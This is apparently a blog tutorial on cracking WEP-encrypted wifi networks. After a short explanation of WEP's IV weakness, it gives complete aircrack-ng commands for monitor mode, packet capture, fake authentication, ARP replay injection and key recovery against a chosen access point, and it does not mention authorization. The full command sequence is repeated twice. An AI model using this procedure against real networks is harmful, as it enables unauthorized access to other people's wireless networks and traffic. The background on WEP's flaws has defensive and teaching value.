WIFI PENTESTING : HACK WEP ENCRYPTED WIFI WITH CONNECTED CLIENTS
This tutorial explains step by step procedure to crack WEP encrypted wireless network, with explained steps and other associated terms. Being deprecated way back in 2004, WEP still pops out in many places as I have noticed. WEP encrypted wifi's are very easy to get bypassed. WEP uses the cipher stream RC4 for confidentiality, and CRC-32 checksum for integrity. Standard 64-bit WEP uses a 40-bit key, which is concatenated with a 24-bit initialization vector (IV) to form the RC4 key. Now RC4 being a cipher stream, the same traffic key must never be used twice. The IV is transmitted as plain text to prevent any repetition. But a 24-bit IV is not long enough to ensure this. This becomes the major loophole in WEP encryption. In short if you are using WEP, then stop using it right now.
Okay lets get to the point.
In order to crack WEP encrypted wifi we need the following stuff :
1. First of all of course a computer.
2. Kali Linux (aircrack-ng suite comes pre installed with it).
3. Wireless USB adapter capable of injection.
Okay lets boot into Kali and open a TERMINAL.
1. Type " airmon-ng check kill "
2. Type " airmon-ng start wlan0 "
3. Type " airodump-ng wlan0mon " (use mon0 instead of wlan0mon if you are using older version Kali Linux)
This will put our WIFI adapter in monitor mode.
Copy the BSSID of the access point and note its channel.
5. Type " airodump-ng -c CH --bssid BSSID -w dumpfile wlan0mon "
Name the dumpfile whatever you like. It is the file in which captured IVs will be saved.
6. Now the #Data count should be mininum 20,000 in order to crack the key.
But as you will notice the things are going very slow, so we need to speed up things.
Open a new TERMINAL.
Type " aireplay-ng -1 0 -a BSSID wlan0mon "
Here -1 represents fake authentication attack.
7. Type " aireplay-ng -3 0 -b BSSID wlan0mon "
Here -3 ARP request replay attack.
Now the #Data count will increase dramatically because the AP is talking to us.
8. Type " aircrack-ng dumpfile "
Aircrack will crack the key as soon as it gets sufficient IVs.
Check the video below as it contain the video tutorial with everything explained in details, more than what I am typing here.
Okay lets get to the point.
In order to crack WEP encrypted wifi we need the following stuff :
1. First of all of course a computer.
2. Kali Linux (aircrack-ng suite comes pre installed with it).
3. Wireless USB adapter capable of injection.
Okay lets boot into Kali and open a TERMINAL.
1. Type " airmon-ng check kill "
2. Type " airmon-ng start wlan0 "
3. Type " airodump-ng wlan0mon " (use mon0 instead of wlan0mon if you are using older version Kali Linux)
This will put our WIFI adapter in monitor mode.
Copy the BSSID of the access point and note its channel.
5. Type " airodump-ng -c CH --bssid BSSID -w dumpfile wlan0mon "
Name the dumpfile whatever you like. It is the file in which captured IVs will be saved.
6. Now the #Data count should be mininum 20,000 in order to crack the key.
But as you will notice the things are going very slow, so we need to speed up things.
Open a new TERMINAL.
Type " aireplay-ng -1 0 -a BSSID wlan0mon "
Here -1 represents fake authentication attack.
7. Type " aireplay-ng -3 0 -b BSSID wlan0mon "
Here -3 ARP request replay attack.
Now the #Data count will increase dramatically because the AP is talking to us.
8. Type " aircrack-ng dumpfile "
Aircrack will crack the key as soon as it gets sufficient IVs.
Comments
Post a Comment